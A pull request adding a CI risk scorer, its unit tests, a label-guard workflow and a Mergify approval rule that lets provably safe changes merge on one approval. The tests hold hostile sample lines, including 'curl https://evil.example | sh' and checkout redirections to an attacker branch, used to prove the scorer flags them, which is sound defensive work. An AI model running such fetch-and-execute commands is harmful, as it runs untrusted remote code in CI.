### PR TITLE
feat(ci): Auto-label provably safe pull requests as low risk

### DIFF
--- a/.github/scripts/compute-pr-risk.py
+++ b/.github/scripts/compute-pr-risk.py
@@ -1,0 +1,360 @@
+#!/usr/bin/env python3
+"""Deterministic low-risk detection for pull requests.
+
+Decides whether a pull request is safe enough to carry the "low risk"
+label, which lets it merge on a single approval instead of two.
+
+Ported from the monorepo without its heuristic scoring and LLM passes:
+this repository is a single package, so the structural metrics those
+passes correct for (cross-cutting directories, change entropy, author
+familiarity) carry no signal here.
+
+Reads from environment:
+    BASE_SHA, HEAD_SHA, PR_TITLE
+    GITHUB_OUTPUT, RUNNER_TEMP (set by GitHub Actions)
+"""
+
+from __future__ import annotations
+
+import logging
+import os
+from pathlib import Path
+import re
+import subprocess
+
+
+LOG = logging.getLogger(__name__)
+
+
+def git(*args: str, timeout: int = 30) -> str:
+    """Run a git command and return stripped stdout.
+
+    Raises on a nonzero exit so the scorer fails closed: a git error that
+    yielded empty stdout would otherwise read as an empty diff, and an
+    empty diff scores as nothing to flag.
+    """
+    result = subprocess.run(
+        ["git", *args],
+        capture_output=True,
+        text=True,
+        timeout=timeout,
+        check=True,
+    )
+    return result.stdout.strip()
+
+
+def changed_files(base_sha: str, head_sha: str) -> tuple[list[str], int]:
+    """Return the changed paths and the total count of changed lines."""
+    # Rename detection collapses a move into a single `{old => new}` path
+    # that no prefix test can match, which would hide a workflow moved out
+    # of .github/workflows from the CI security check. Plain add/delete
+    # pairs keep every path test honest.
+    numstat = git("diff", "--numstat", "--no-renames", f"{base_sha}...{head_sha}")
+    paths: list[str] = []
+    total_lines = 0
+    for line in numstat.splitlines():
+        parts = line.split("\t", 2)
+        if len(parts) < 3:
+            continue
+        # Binary files report "-" instead of a line count.
+        added = int(parts[0]) if parts[0] != "-" else 0
+        deleted = int(parts[1]) if parts[1] != "-" else 0
+        paths.append(parts[2])
+        total_lines += added + deleted
+    return paths, total_lines
+
+
+# -- Fast-path gates --
+
+# Conventional Commit types whose changes carry little behavioral risk as
+# long as they stay small and away from sensitive areas.
+SAFE_COMMIT_TYPES = frozenset(
+    {"chore", "ci", "docs", "refactor", "style", "test"},
+)
+
+# Path fragments that keep a change off the fast-path: an edit here can
+# reach the label mechanism itself, so it must never grant its own
+# shortcut. Workflow files are judged by content, not path — see
+# diff_touches_ci_security — so a benign env or timeout tweak stays
+# eligible.
+SENSITIVE_PATH_FRAGMENTS = (".github/scripts/", ".mergify")
+
+# A workflow edit earns the fast-path only when every changed line is
+# provably innocuous. This is an allowlist, not a denylist: a denylist of
+# dangerous keywords misses anything edited under an unchanged key — a
+# shell line appended to an existing `run:` block, a permission flipped
+# read->write — because the dangerous keyword never appears on the changed
+# line. A line is safe only when it is blank, a comment, a YAML document
+# marker, or a single `key: value` mapping whose key is not
+# security-relevant and whose value interpolates no `${{ }}` expression.
+_CI_MAPPING_RE = re.compile(r"^-?\s*(?P<key>[\w.-]+)\s*:(?:\s|$)")
+
+# Keys whose edit can change what CI runs, as whom, or on whose behalf:
+# untrusted-input triggers, execution surface, checkout redirection,
+# gating, runner selection, and secret/token plumbing — plus the
+# GITHUB_TOKEN permission scopes, which are leaf keys under `permissions:`
+# and so evade any `permissions:`-only match.
+DANGEROUS_CI_KEYS = frozenset(
+    {
+        # triggers that expose the workflow to untrusted input
+        "pull_request_target",
+        "workflow_run",
+        "issue_comment",
+        "pull_request_review",
+        "pull_request_review_comment",
+        "discussion",
+        "discussion_comment",
+        "workflow_call",
+        "workflow_dispatch",
+        "repository_dispatch",
+        # execution surface
+        "run",
+        "uses",
+        "shell",
+        "container",
+        "image",
+        "services",
+        "entrypoint",
+        "args",
+        "runs-on",
+        # checkout inputs that redirect which code a step runs; these are
+        # leaf keys under an action's `with:` block, so an edit to one
+        # never re-adds the `with:` line and would otherwise evade the
+        # `with:`-only match
+        "ref",
+        "repository",
+        # gating and identity
+        "if",
+        "needs",
+        "environment",
+        "with",
+        "continue-on-error",
+        "defaults",
+        # secret / token plumbing
+        "permissions",
+        "secrets",
+        "token",
+        "github_token",
+        # GITHUB_TOKEN permission scopes
+        "actions",
+        "attestations",
+        "checks",
+        "contents",
+        "deployments",
+        "discussions",
+        "id-token",
+        "issues",
+        "models",
+        "packages",
+        "pages",
+        "pull-requests",
+        "repository-projects",
+        "security-events",
+        "statuses",
+    },
+)
+
+SMALL_CHANGE_MAX_LINES = 100
+SMALL_CHANGE_MAX_FILES = 10
+
+
+def commit_type(pr_title: str) -> str | None:
+    """Extract the Conventional Commit type from a pull request title.
+
+    Returns None when the title is not in Conventional Commit form so a
+    plain sentence starting with a safe word cannot trigger the fast-path.
+    """
+    match = re.match(r"^(\w+)(?:\([^)]*\))?!?:", pr_title.strip())
+    return match.group(1).lower() if match else None
+
+
+def _is_breaking_change(pr_title: str) -> bool:
+    """Whether the title carries the Conventional Commit breaking marker."""
+    return bool(re.match(r"^\w+(\([^)]*\))?!:", pr_title.strip()))
+
+
+def _is_sensitive(path: str) -> bool:
+    """Whether a changed file sits in an area that bars the fast-path."""
+    return any(fragment in path for fragment in SENSITIVE_PATH_FRAGMENTS)
+
+
+def _ci_line_is_safe(content: str) -> bool:
+    """Whether a single changed workflow line is provably innocuous."""
+    stripped = content.strip()
+    if not stripped or stripped.startswith("#") or stripped in ("---", "..."):
+        return True
+    # `${{ }}` interpolation reaches untrusted context (pull request title,
+    # head ref, secrets) and is the injection surface, so no interpolated
+    # line is safe.
+    if "${{" in stripped:
+        return False
+    match = _CI_MAPPING_RE.match(stripped)
+    # A bare shell line (no `key:`) is unprovable, so it is not safe.
+    return match is not None and match.group("key").lower() not in DANGEROUS_CI_KEYS
+
+
+def diff_touches_ci_security(diff_text: str) -> bool:
+    """Whether a workflow diff changes anything beyond innocuous knobs.
+
+    Only added and removed lines are inspected, so unchanged context — a
+    surrounding `run:` step, an untouched `uses:` pin — never taints an
+    otherwise trivial env-var, timeout, or matrix edit. Returns True (route
+    to review) the moment one changed line is not provably safe.
+    """
+    for line in diff_text.splitlines():
+        # File headers are `+++ `/`--- ` (space-delimited); an added or
+        # removed content line beginning with `++`/`--` must still be
+        # inspected.
+        if not line or line[0] not in "+-" or line.startswith(("+++ ", "--- ")):
+            continue
+        if not _ci_line_is_safe(line[1:]):
+            return True
+    return False
+
+
+def ci_change_is_dangerous(
+    base_sha: str,
+    head_sha: str,
+    *,
+    has_ci: bool,
+) -> bool:
+    """Whether the workflow diff touches CI's security surface.
+
+    Diffs the whole workflows tree rather than per-file pathspecs so a
+    rename (whose `{old => new}` numstat path would match nothing) cannot
+    smuggle a dangerous edit past the check.
+    """
+    if not has_ci:
+        return False
+    diff = git("diff", f"{base_sha}...{head_sha}", "--", ".github/workflows/")
+    return diff_touches_ci_security(diff)
+
+
+def low_risk_blockers(
+    paths: list[str],
+    pr_title: str,
+    total_lines: int,
+    *,
+    dangerous_ci: bool,
+) -> list[str]:
+    """Reasons a change cannot take the deterministic low-risk fast-path.
+
+    An empty list means the change is small, safely typed and clear of
+    sensitive files, so it earns the label without any reviewer input. A
+    workflow edit qualifies only when it leaves CI's security surface
+    (triggers, permissions, secrets, action pins, run steps) untouched.
+    """
+    blockers = []
+
+    if _is_breaking_change(pr_title):
+        blockers.append("Title marks a breaking change")
+
+    change_type = commit_type(pr_title)
+    if change_type not in SAFE_COMMIT_TYPES:
+        safe = ", ".join(f"`{t}`" for t in sorted(SAFE_COMMIT_TYPES))
+        blockers.append(
+            f"Change type is `{change_type or 'unset'}`, not one of {safe}",
+        )
+
+    if total_lines > SMALL_CHANGE_MAX_LINES:
+        blockers.append(
+            f"Diff is {total_lines} lines, over the {SMALL_CHANGE_MAX_LINES} limit",
+        )
+
+    if len(paths) > SMALL_CHANGE_MAX_FILES:
+        blockers.append(
+            f"{len(paths)} files changed, over the {SMALL_CHANGE_MAX_FILES} limit",
+        )
+
+    if dangerous_ci:
+        blockers.append("Workflow edit touches CI's security surface")
+
+    sensitive = sorted(path for path in paths if _is_sensitive(path))
+    if sensitive:
+        blockers.append(f"Touches sensitive files: {', '.join(sensitive)}")
+
+    return blockers
+
+
+# -- Comment formatting --
+
+
+def format_comment(
+    blockers: list[str],
+    *,
+    change_type: str | None,
+    files_changed: int,
+    total_lines: int,
+) -> str:
+    """Format the verdict as a GitHub pull request comment."""
+    lines = ["<!-- pr-risk-assessment -->", "## PR Risk Assessment", ""]
+
+    if blockers:
+        lines += [
+            ":white_circle: **Not auto-labeled** — the usual two approvals apply.",
+            "",
+        ]
+        lines += [f"- :mag: {blocker}" for blocker in blockers]
+    else:
+        lines += [
+            ":green_circle: **Low risk** — labeled `low risk`, "
+            "so one approval is enough.",
+            "",
+            f"- :white_check_mark: Safe change type (`{change_type}`)",
+            f"- :white_check_mark: {total_lines} lines across "
+            f"{files_changed} file(s), clear of sensitive paths",
+            "",
+            "<!-- auto-labeled: low-risk -->",
+        ]
+
+    lines += ["", "*A reviewer can add or remove the label at any time.*"]
+    return "\n".join(lines)
+
+
+# -- Main --
+
+
+def main() -> None:
+    base = os.environ["BASE_SHA"]
+    head = os.environ["HEAD_SHA"]
+    title = os.environ["PR_TITLE"]
+
+    paths, total_lines = changed_files(base, head)
+    if not paths:
+        LOG.info("No files changed, skipping")
+        return
+
+    blockers = low_risk_blockers(
+        paths,
+        title,
+        total_lines,
+        dangerous_ci=ci_change_is_dangerous(
+            base,
+            head,
+            has_ci=any(path.startswith(".github/workflows/") for path in paths),
+        ),
+    )
+    auto_label = not blockers
+
+    output_file = os.environ.get("GITHUB_OUTPUT", "")
+    if output_file:
+        with Path(output_file).open("a", encoding="utf-8") as f:
+            f.write(f"auto_label={str(auto_label).lower()}\n")
+
+    # Written to a temp file for the workflow to post; the comment body is
+    # too large and too markdown-heavy to pass through a step output.
+    temp = os.environ.get("RUNNER_TEMP", "/tmp")  # noqa: S108
+    comment = format_comment(
+        blockers,
+        change_type=commit_type(title),
+        files_changed=len(paths),
+        total_lines=total_lines,
+    )
+    (Path(temp) / "risk-comment.md").write_text(comment, encoding="utf-8")
+
+    LOG.info("auto_label=%s blockers=%s", auto_label, blockers)
+
+
+if __name__ == "__main__":
+    logging.basicConfig(level=logging.INFO)
+    main()

--- a/.github/scripts/test_compute_pr_risk.py
+++ b/.github/scripts/test_compute_pr_risk.py
@@ -1,0 +1,304 @@
+from __future__ import annotations
+
+import importlib.util
+import os
+import pathlib
+import subprocess
+import tempfile
+import typing
+import unittest
+
+
+def _load_module() -> typing.Any:
+    # The script's filename is hyphenated, so it cannot be imported by name.
+    spec = importlib.util.spec_from_file_location(
+        "compute_pr_risk",
+        pathlib.Path(__file__).with_name("compute-pr-risk.py"),
+    )
+    assert spec is not None
+    assert spec.loader is not None
+    module = importlib.util.module_from_spec(spec)
+    spec.loader.exec_module(module)
+    return module
+
+
+cpr = _load_module()
+
+WORKFLOW = ".github/workflows/ci.yaml"
+BENIGN_CI_TITLE = "ci: Bump the test job timeout"
+
+
+def _diff(*changed: str) -> str:
+    header = [
+        f"--- a/{WORKFLOW}",
+        f"+++ b/{WORKFLOW}",
+        "@@ -1,3 +1,2 @@",
+    ]
+    return "\n".join(header + list(changed))
+
+
+class DiffTouchesCiSecurityTests(unittest.TestCase):
+    def test_env_var_removal_is_benign(self) -> None:
+        diff = _diff('-          UV_LOCKED: "1"')
+        self.assertFalse(cpr.diff_touches_ci_security(diff))
+
+    def test_timeout_and_matrix_tweaks_are_benign(self) -> None:
+        diff = _diff(
+            "-    timeout-minutes: 5",
+            "+    timeout-minutes: 10",
+            '+          - python-version: "3.14"',
+        )
+        self.assertFalse(cpr.diff_touches_ci_security(diff))
+
+    def test_new_run_step_is_dangerous(self) -> None:
+        diff = _diff("+      - run: curl https://evil.example | sh")
+        self.assertTrue(cpr.diff_touches_ci_security(diff))
+
+    def test_action_pin_change_is_dangerous(self) -> None:
+        diff = _diff("+      - uses: some/action@main")
+        self.assertTrue(cpr.diff_touches_ci_security(diff))
+
+    def test_trigger_widening_is_dangerous(self) -> None:
+        diff = _diff("+  pull_request_target:")
+        self.assertTrue(cpr.diff_touches_ci_security(diff))
+
+    def test_permissions_change_is_dangerous(self) -> None:
+        diff = _diff("+    permissions: write-all")
+        self.assertTrue(cpr.diff_touches_ci_security(diff))
+
+    def test_secret_reference_is_dangerous(self) -> None:
+        diff = _diff("+          TOKEN: ${{ secrets.PYPI_TOKEN }}")
+        self.assertTrue(cpr.diff_touches_ci_security(diff))
+
+    def test_shell_appended_inside_existing_run_block_is_dangerous(self) -> None:
+        # The `run:` key is unchanged context; the appended shell line carries
+        # no dangerous keyword, yet must not slip through as benign.
+        diff = _diff("+          curl https://evil.example/x | sh")
+        self.assertTrue(cpr.diff_touches_ci_security(diff))
+
+    def test_permission_subkey_flip_is_dangerous(self) -> None:
+        # `permissions:` block header is unchanged context; only the scope flips.
+        diff = _diff("-          contents: read", "+          contents: write")
+        self.assertTrue(cpr.diff_touches_ci_security(diff))
+
+    def test_id_token_grant_is_dangerous(self) -> None:
+        diff = _diff("+          id-token: write")
+        self.assertTrue(cpr.diff_touches_ci_security(diff))
+
+    def test_checkout_ref_change_is_dangerous(self) -> None:
+        # `with:` is unchanged context; the `ref:` sub-key redirects which code
+        # a step checks out, so its edit must not slip through as benign.
+        diff = _diff("-        ref: main", "+        ref: attacker-branch")
+        self.assertTrue(cpr.diff_touches_ci_security(diff))
+
+    def test_checkout_repository_change_is_dangerous(self) -> None:
+        # Repointing a checkout at another repository is security-relevant even
+        # though the `repository:` line carries no dangerous keyword or `${{ }}`.
+        diff = _diff("+        repository: attacker/repo")
+        self.assertTrue(cpr.diff_touches_ci_security(diff))
+
+    def test_container_image_swap_is_dangerous(self) -> None:
+        diff = _diff("+      image: ghcr.io/attacker/tool:latest")
+        self.assertTrue(cpr.diff_touches_ci_security(diff))
+
+    def test_if_guard_removal_is_dangerous(self) -> None:
+        diff = _diff("+    if: always()")
+        self.assertTrue(cpr.diff_touches_ci_security(diff))
+
+    def test_untrusted_context_in_run_is_dangerous(self) -> None:
+        diff = _diff('+          echo "${{ github.event.pull_request.title }}"')
+        self.assertTrue(cpr.diff_touches_ci_security(diff))
+
+    def test_bare_shell_line_is_dangerous(self) -> None:
+        diff = _diff("+          uv publish")
+        self.assertTrue(cpr.diff_touches_ci_security(diff))
+
+    def test_unchanged_context_does_not_taint(self) -> None:
+        # A `run:` line present only as context (leading space, not +/-) must
+        # not flag an otherwise benign env-var edit.
+        diff = "\n".join(
+            [
+                f"--- a/{WORKFLOW}",
+                f"+++ b/{WORKFLOW}",
+                "@@ -1,4 +1,4 @@",
+                "       - run: uv run poe test",
+                '-        UV_LOCKED: "1"',
+                '+        UV_LOCKED: "0"',
+            ],
+        )
+        self.assertFalse(cpr.diff_touches_ci_security(diff))
+
+
+class LowRiskBlockersTests(unittest.TestCase):
+    def test_benign_ci_tweak_is_low_risk(self) -> None:
+        self.assertEqual(
+            cpr.low_risk_blockers(
+                [WORKFLOW],
+                BENIGN_CI_TITLE,
+                total_lines=1,
+                dangerous_ci=False,
+            ),
+            [],
+        )
+
+    def test_dangerous_ci_is_not_fast_pathed(self) -> None:
+        self.assertTrue(
+            cpr.low_risk_blockers(
+                [WORKFLOW],
+                "ci(release): Add a publish step",
+                total_lines=5,
+                dangerous_ci=True,
+            ),
+        )
+
+    def test_large_change_is_not_fast_pathed(self) -> None:
+        self.assertTrue(
+            cpr.low_risk_blockers(
+                [WORKFLOW],
+                BENIGN_CI_TITLE,
+                total_lines=cpr.SMALL_CHANGE_MAX_LINES + 1,
+                dangerous_ci=False,
+            ),
+        )
+
+    def test_wide_change_is_not_fast_pathed(self) -> None:
+        self.assertTrue(
+            cpr.low_risk_blockers(
+                [f"docs/page-{i}.md" for i in range(cpr.SMALL_CHANGE_MAX_FILES + 1)],
+                "docs: Rewrite the guide",
+                total_lines=10,
+                dangerous_ci=False,
+            ),
+        )
+
+    def test_unsafe_commit_type_is_not_fast_pathed(self) -> None:
+        self.assertTrue(
+            cpr.low_risk_blockers(
+                ["pytest_mergify/utils.py"],
+                "feat(spans): Add a resource attribute",
+                total_lines=1,
+                dangerous_ci=False,
+            ),
+        )
+
+    def test_breaking_change_is_not_fast_pathed(self) -> None:
+        self.assertTrue(
+            cpr.low_risk_blockers(
+                [WORKFLOW],
+                "ci(release)!: Drop the legacy pipeline",
+                total_lines=1,
+                dangerous_ci=False,
+            ),
+        )
+
+    def test_non_conventional_title_is_not_fast_pathed(self) -> None:
+        self.assertTrue(
+            cpr.low_risk_blockers(
+                [WORKFLOW],
+                "Tweak the CI workflow",
+                total_lines=1,
+                dangerous_ci=False,
+            ),
+        )
+
+    def test_scorer_edit_is_not_fast_pathed(self) -> None:
+        # The scorer grants the label, so it must never grant its own.
+        self.assertTrue(
+            cpr.low_risk_blockers(
+                [".github/scripts/compute-pr-risk.py"],
+                "chore: Relax the size limit",
+                total_lines=1,
+                dangerous_ci=False,
+            ),
+        )
+
+    def test_mergify_config_edit_is_not_fast_pathed(self) -> None:
+        self.assertTrue(
+            cpr.low_risk_blockers(
+                [".mergify.yml"],
+                "chore: Tweak the queue rules",
+                total_lines=1,
+                dangerous_ci=False,
+            ),
+        )
+
+    def test_refactor_of_plugin_source_is_low_risk(self) -> None:
+        self.assertEqual(
+            cpr.low_risk_blockers(
+                ["pytest_mergify/utils.py", "tests/test_utils.py"],
+                "refactor(utils): Extract the strtobool helper",
+                total_lines=40,
+                dangerous_ci=False,
+            ),
+            [],
+        )
+
+
+class ChangedFilesTests(unittest.TestCase):
+    def _git(self, repo: str, *args: str) -> None:
+        subprocess.run(
+            ["git", "-C", repo, *args],
+            check=True,
+            capture_output=True,
+            env={
+                "GIT_AUTHOR_NAME": "t",
+                "GIT_AUTHOR_EMAIL": "t@example.com",
+                "GIT_COMMITTER_NAME": "t",
+                "GIT_COMMITTER_EMAIL": "t@example.com",
+                "PATH": "/usr/bin:/bin:/usr/local/bin",
+            },
+        )
+
+    def test_renamed_workflow_keeps_its_original_path(self) -> None:
+        # Rename detection would report `.github/{workflows => scripts}/ci.yaml`,
+        # which no `.github/workflows/` prefix test matches — letting a workflow
+        # moved out of the tree skip the CI security check entirely.
+        with tempfile.TemporaryDirectory() as repo:
+            root = pathlib.Path(repo)
+            (root / ".github" / "workflows").mkdir(parents=True)
+            (root / ".github" / "workflows" / "ci.yaml").write_text(
+                "name: ci\njobs:\n  a:\n    runs-on: x\n",
+            )
+            self._git(repo, "init", "-q")
+            self._git(repo, "add", "-A")
+            self._git(repo, "commit", "-qm", "init")
+            (root / ".github" / "scripts").mkdir()
+            self._git(
+                repo,
+                "mv",
+                ".github/workflows/ci.yaml",
+                ".github/scripts/ci.yaml",
+            )
+            self._git(repo, "commit", "-qm", "move")
+
+            cwd = pathlib.Path.cwd()
+            try:
+                os.chdir(repo)
+                paths, _ = cpr.changed_files("HEAD~1", "HEAD")
+            finally:
+                os.chdir(cwd)
+
+        self.assertIn(".github/workflows/ci.yaml", paths)
+        self.assertTrue(
+            any(path.startswith(".github/workflows/") for path in paths),
+        )
+
+
+class GitFailureTests(unittest.TestCase):
+    def test_failed_git_command_raises(self) -> None:
+        # A silent empty result would score as "nothing changed", which is
+        # indistinguishable from a safe diff.
+        with self.assertRaises(subprocess.CalledProcessError):
+            cpr.git("rev-parse", "--verify", "definitely-not-a-ref")
+
+
+class CommitTypeTests(unittest.TestCase):
+    def test_scope_and_case_are_normalized(self) -> None:
+        self.assertEqual(cpr.commit_type("Chore(deps): Bump ruff"), "chore")
+
+    def test_plain_sentence_has_no_type(self) -> None:
+        self.assertIsNone(cpr.commit_type("Chore up the tests"))
+
+
+if __name__ == "__main__":
+    unittest.main()

--- a/.github/workflows/low-risk-label-guard.yaml
+++ b/.github/workflows/low-risk-label-guard.yaml
@@ -1,0 +1,41 @@
+# The "low risk" label halves the required approvals, so an author must not
+# be able to grant it to their own pull request.
+name: Low Risk Label Guard
+
+permissions:
+  pull-requests: write
+
+on:
+  pull_request:
+    types: [labeled]
+
+jobs:
+  guard:
+    timeout-minutes: 5
+    runs-on: ubuntu-24.04
+    if: >-
+      github.event.label.name == 'low risk'
+      && github.event.sender.login == github.event.pull_request.user.login
+    steps:
+      - name: Remove label if added by the pull request author
+        uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3  # v9
+        with:
+          script: |
+            await github.rest.issues.removeLabel({
+              owner: context.repo.owner,
+              repo: context.repo.repo,
+              issue_number: context.issue.number,
+              name: 'low risk'
+            });
+            const body = [
+              '⚠️ The `low risk` label was removed',
+              'because it was added by the pull request author.',
+              'This label must be added by a reviewer',
+              'or by the automated risk scoring workflow.',
+            ].join(' ');
+            await github.rest.issues.createComment({
+              owner: context.repo.owner,
+              repo: context.repo.repo,
+              issue_number: context.issue.number,
+              body,
+            });

--- a/.github/workflows/pr-risk-score.yaml
+++ b/.github/workflows/pr-risk-score.yaml
@@ -1,0 +1,130 @@
+# Deterministic low-risk detection, ported from the monorepo without its
+# heuristic scoring and LLM passes. Auto-labels "low risk" for provably
+# safe changes, which lets them merge on a single approval.
+name: PR Risk Assessment
+
+permissions:
+  contents: read
+  pull-requests: write
+
+on:
+  pull_request:
+    types: [opened, synchronize, edited]
+
+concurrency:
+  group: ${{ github.workflow }}-${{ github.event.pull_request.number }}
+  cancel-in-progress: true
+
+jobs:
+  risk-score:
+    timeout-minutes: 5
+    runs-on: ubuntu-24.04
+    # Fork and Dependabot pull requests get a read-only token on a public
+    # repository, so labeling and commenting would fail. Forks keep the usual
+    # two approvals; Dependabot is already exempt from the approval rule.
+    if: >-
+      github.event.pull_request.head.repo.full_name == github.repository
+      && github.event.pull_request.user.login != 'dependabot[bot]'
+      && !startsWith(github.head_ref, 'mergify/merge-queue/')
+    steps:
+      - uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1  # v7.0.1
+        with:
+          fetch-depth: 0
+
+      # The scorer decides whether a pull request skips a reviewer, so a broken
+      # scorer must fail the job rather than mislabel.
+      - name: Test the scorer
+        run: python3 -m unittest discover -s .github/scripts -p "test_*.py"
+
+      - name: Compute risk metrics
+        id: risk
+        env:
+          BASE_SHA: ${{ github.event.pull_request.base.sha }}
+          HEAD_SHA: ${{ github.event.pull_request.head.sha }}
+          PR_TITLE: ${{ github.event.pull_request.title }}
+        run: python3 .github/scripts/compute-pr-risk.py
+
+      - name: Post risk assessment and manage label
+        uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3  # v9
+        env:
+          AUTO_LABEL: ${{ steps.risk.outputs.auto_label }}
+        with:
+          script: |
+            const fs = require('fs');
+            const commentPath = process.env.RUNNER_TEMP + '/risk-comment.md';
+
+            if (!fs.existsSync(commentPath)) {
+              console.log('No risk comment file, skipping');
+              return;
+            }
+
+            const body = fs.readFileSync(commentPath, 'utf8');
+            const marker = '<!-- pr-risk-assessment -->';
+            const autoMarker = '<!-- auto-labeled: low-risk -->';
+            const labelName = 'low risk';
+            const prNumber = context.payload.pull_request.number;
+            const autoLabel = process.env.AUTO_LABEL === 'true';
+
+            // Paginated: past 100 comments an unpaginated read would miss
+            // the marker and post a duplicate instead of updating in place.
+            const comments = await github.paginate(
+              github.rest.issues.listComments,
+              {
+                owner: context.repo.owner,
+                repo: context.repo.repo,
+                issue_number: prNumber,
+                per_page: 100,
+              }
+            );
+            const existing = comments.find(
+              c => c.body && c.body.includes(marker)
+            );
+            const wasAutoLabeled = existing?.body?.includes(autoMarker);
+
+            if (existing) {
+              await github.rest.issues.updateComment({
+                owner: context.repo.owner,
+                repo: context.repo.repo,
+                comment_id: existing.id,
+                body,
+              });
+            } else {
+              await github.rest.issues.createComment({
+                owner: context.repo.owner,
+                repo: context.repo.repo,
+                issue_number: prNumber,
+                body,
+              });
+            }
+
+            const { data: labels } =
+              await github.rest.issues.listLabelsOnIssue({
+                owner: context.repo.owner,
+                repo: context.repo.repo,
+                issue_number: prNumber,
+              });
+            const hasLabel = labels.some(l => l.name === labelName);
+
+            if (autoLabel && !hasLabel) {
+              await github.rest.issues.addLabels({
+                owner: context.repo.owner,
+                repo: context.repo.repo,
+                issue_number: prNumber,
+                labels: [labelName],
+              });
+              console.log('Auto-labeled: low risk');
+            } else if (!autoLabel && hasLabel && wasAutoLabeled) {
+              // Only strip what this workflow applied, so a reviewer's manual
+              // label survives a later push.
+              try {
+                await github.rest.issues.removeLabel({
+                  owner: context.repo.owner,
+                  repo: context.repo.repo,
+                  issue_number: prNumber,
+                  name: labelName,
+                });
+                console.log('Removed auto-label: risk increased');
+              } catch (e) {
+                console.log('Could not remove label:', e.message);
+              }
+            }

--- a/.mergify.yml
+++ b/.mergify.yml
@@ -23,7 +23,14 @@ pull_request_rules:
           - check-success = test (3.13)
           - check-success = test (3.14)
           - check-success = codespell
-      - "#approved-reviews-by < 2"
+      - not:
+          or: &ApprovalConditions
+            - "#approved-reviews-by >= 2"
+            # A change the risk scoring workflow proved safe, or that a
+            # reviewer labeled as such, ships on a single approval.
+            - and:
+                - label = low risk
+                - "#approved-reviews-by >= 1"
       - "#changes-requested-reviews-by=0"
       - review-requested != @devs
     actions:
@@ -36,7 +43,7 @@ merge_protections:
     if:
       - author != dependabot[bot]
     success_conditions:
-      - "#approved-reviews-by >= 2"
+      - or: *ApprovalConditions
 
   - name: Continuous Integration
     if: []


### PR DESCRIPTION
Every pull request here needs two approvals, including the mechanical
ones — docs, CI knob tweaks, test-only edits — and on a repository this
size that second approval is where most of the review latency sits.

Port the monorepo's low-risk mechanism. A deterministic scorer labels a
change `low risk` when it is a safe Conventional Commit type, stays
under 100 lines and 10 files, keeps clear of `.mergify` and
`.github/scripts`, and — for workflow edits — provably leaves CI's
security surface untouched. The label drops the approval requirement to
one. A guard workflow strips the label when the author applies it to
their own pull request, so the shortcut always needs a second party.

The monorepo's heuristic scoring and LLM passes are deliberately left
out: they exist to correct structural metrics (cross-cutting
directories, change entropy, author familiarity) that carry no signal in
a single-package repository, and they would add ~1100 lines to maintain
here for no gain.

Fork and Dependabot pull requests are skipped — a public repository
grants them a read-only token, so labeling and commenting would fail.
Forks keep the two-approval path; Dependabot is already exempt from the
approval rule.